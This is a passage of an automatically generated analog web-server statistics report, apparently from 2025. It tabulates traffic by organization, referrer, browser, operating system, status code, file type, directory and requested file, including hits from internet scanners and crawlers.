class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">38</td><td class="P">29</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">21</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">754</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">81</td><td class="b"> 7.74%</td><td class="xl">205.169</td></tr> <tr><td class="R">59</td><td class="b">42.51%</td><td class="xl">20</td></tr> <tr><td class="R">52</td><td class="b"> 5.11%</td><td class="xl">34</td></tr> <tr><td class="R">35</td><td class="b"> 2.34%</td><td class="xl">3</td></tr> <tr><td class="R">31</td><td class="b"> 1.87%</td><td class="xl">167.94</td></tr> <tr><td class="R">31</td><td class="b"> 3.02%</td><td class="xl">27</td></tr> <tr><td class="R">30</td><td class="b"> 3.00%</td><td class="xl">54</td></tr> <tr><td class="R">29</td><td class="b"> 2.18%</td><td class="xl">35</td></tr> <tr><td class="R">24</td><td class="b"> 2.34%</td><td class="xl">44</td></tr> <tr><td class="R">22</td><td class="b"> 2.70%</td><td class="xl">205.210</td></tr> <tr><td class="R">16</td><td class="b"> 1.98%</td><td class="xl">198.235</td></tr> <tr><td class="R">14</td><td class="b"> 0.09%</td><td class="xl">194.87</td></tr> <tr><td class="R">13</td><td class="b"> 0.77%</td><td class="xl">206.168</td></tr> <tr><td class="R">12</td><td class="b"> 1.00%</td><td class="xl">185.177</td></tr> <tr><td class="R">12</td><td class="b"> 0.71%</td><td class="xl">199.45</td></tr> <tr><td class="R">11</td><td class="b"> 0.65%</td><td class="xl">18</td></tr> <tr><td class="R">11</td><td class="b"> 0.91%</td><td class="xl">64.227</td></tr> <tr><td class="R">10</td><td class="b"> 0.97%</td><td class="xl">123</td></tr> <tr><td class="R">10</td><td class="b"> 1.16%</td><td class="xl">179.43</td></tr> <tr><td class="R">10</td><td class="b"> 0.52%</td><td class="xl">104</td></tr> <tr><td class="R">241</td><td class="b">18.42%</td><td class="xl">[not listed: 90 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">252</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">53</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">24</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.accelerategreatschools.org//wp-login.php">https://www.accelerategreatschools.org//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">72</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">62</td><td class="xl">http://account.imators.com/</td></tr> <tr><td class="R">9</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.it/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.accelerategreatschools.org/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">61</td><td class="P">61</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">41</td><td class="P">41</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">31</td><td class="P">31</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">59</td><td class="P">19</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">16</td><td class="P">14</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">11</td><td class="P">11</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">35</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">15</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">25</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 11; V2055A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36</td></tr> <tr><td class="R">174</td><td class="P">73</td><td class="xl">[not listed: 69 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">367</td><td class="P">212</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">346</td><td class="P">199</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">12</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/614</td></tr> <tr><td class="N">2</td><td class="R">213</td><td class="P">144</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">33</td><td class="P">32</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/13</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/89</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/126</td></tr> <tr><td class="N">4</td><td class="R">29</td><td class="P">22</td><td class="xl">Mozilla</td></tr> <tr><td class="N">5</td><td class="R">16</td><td class="P">14</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">16</td><td class="P">14</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">8</td><td class="P">8</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">8</td><td class="P">8</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">7</td><td class="R">4</td><td class="P">4</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> curl/7</td></tr> <tr><td class="N">8</td><td class="R">4</td><td class="P">4</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">4</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> MSIE/6</td></tr> <tr><td class="N">10</td><td class="R">22</td><td class="P">2</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">22</td><td class="P">2</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N"> </td><td class="R">15</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">298</td><td class="P">192</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">222</td><td class="P">135</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">201</td><td class="P">124</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">21</td><td class="P">11</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">152</td><td class="P">92</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">152</td><td class="P">92</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">43</td><td class="P">27</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">754</td><td class="xl">200 OK</td></tr> <tr><td class="R">17</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">118</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">1993</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">1</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">8</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">43</td><td class="b"> 0.33%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">448</td><td class="b">24.47%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">254</td><td class="b">55.79%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">19.41%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">28</td><td class="b">40.36%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">485</td><td class="b">37.11%</td><td class="xl">[directories]</td></tr> <tr><td class="R">128</td><td class="b">16.69%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">33</td><td class="b"> 4.08%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">37</td><td class="b"> 1.42%</td><td class="xl">.svg</td></tr> <tr><td class="R">43</td><td class="b"> 0.33%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">508</td><td class="b">77.15%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">198</td><td class="b">22.20%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">48</td><td class="b"> 0.65%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">480</td><td class="b">36.79%</td><td class="D">Sep/27/25 2:08 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">53</td><td class="b"> 4.10%</td><td class="D">Sep/27/25 2:08 PM</td><td class="xl"> <a href="/?165.232.149.232">/?165.232.149.232</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.99%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 1.03%</td><td class="D">May/31/25 8:38 PM</td><td class="xl"> <a href="/?164.90.228.79">/?164.90.228.79</a></td></tr> <tr><td class="R">65</td><td class="b"> 2.25%</td><td class="D">Sep/22/25 11:53 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">63</td><td class="b">14.44%</td><td class="D">Sep/22/25 11:53 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">33</td><td class="b"> 1.28%</td><td class="D">Aug/12/25 3:11 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">33</td><td class="b"> 4.08%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">28</td><td class="b">40.36%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl">/akcc.php</td></tr> <tr class="sub level2"><td class="R">16</td><td class="b">13.58%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl"> /akcc.php?p=</td></tr> <tr><td class="R">52</td><td class="b"> 0.79%</td><td class="D">Sep/ 4/25 10:03 PM</td><td class="xl">[not listed: 24 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 